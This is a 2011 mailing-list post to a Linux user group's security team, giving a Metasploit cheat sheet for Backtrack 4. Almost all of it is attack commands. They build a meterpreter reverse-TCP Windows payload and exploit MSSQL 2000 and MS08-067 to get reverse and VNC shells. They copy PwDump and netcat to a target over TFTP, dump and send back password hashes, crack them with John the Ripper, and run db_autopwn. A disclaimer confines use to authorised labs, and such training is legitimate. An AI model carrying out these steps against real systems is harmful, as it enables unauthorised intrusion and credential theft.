Basic Metasploit CHEAT Sheet

Author: Lisa Kachold
Date:  
To: Main PLUG discussion list, PLUG Linux Security Team
Subject: Basic Metasploit CHEAT Sheet
Okay, you guys, here are a couple of HowTos for basic Metasploit from
Backtrack4R1:

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/wicd start
{check your wireless or wired connection is working}
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 X > /root/payload.exe
(X = write the payload out as a Windows executable)

optimize /root/putty.exe (for Windows target)
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set LHOST (local host ip)
msf> exploit

meterpreter > migrate <process #>
example: meterpreter > migrate 256
msf> show exploits
msf> use <name> (from show exploits)
msf> set PAYLOAD
msf> set RHOST
msf> set LHOST


1) Nmap Mssql 2000
nmap -sT -O 10.10.10.254
nmap -sV 10.10.10.254
msfconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu -> System -> MISC -> TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
zcat wordlist.txt.gz > /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc.exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john --show pwdmp4.txt
john --wordlist=wordlist.txt --format=NT pwdmp4.txt
<back to Windows>
nc -L -p <port>
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
msfconsole
db_create foo
db_nmap 10.10.10.254 (target ip)
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
msfconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./msfconsole
<another shell>
./nessus
Start a scan and Generate a Report
msf> help
msf> db_create /root/database/foobar.db
msf> db_import

Cross reference from the report showing the exploit port open and probable,
as reported from Nessus.
Save output of the Nessus report to /root/nessus.nbe

msf> db_import_nessus_nbe /root/nessus.nbe
msf> db_autopwn -p -e

Voilà!

*DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals after written Corporate
approval. We do not advocate "cracking" and prefer the definition of
hacker in its original term, meaning those who reverse engineer and
creatively evaluate to learn. We do not advocate "learning to hack";
instead, hacking to learn.*

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
January 29, 2011, Noon until 3PM.

--

(503) 754-4452
(623) 688-3392

http://www.obnosis.com
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss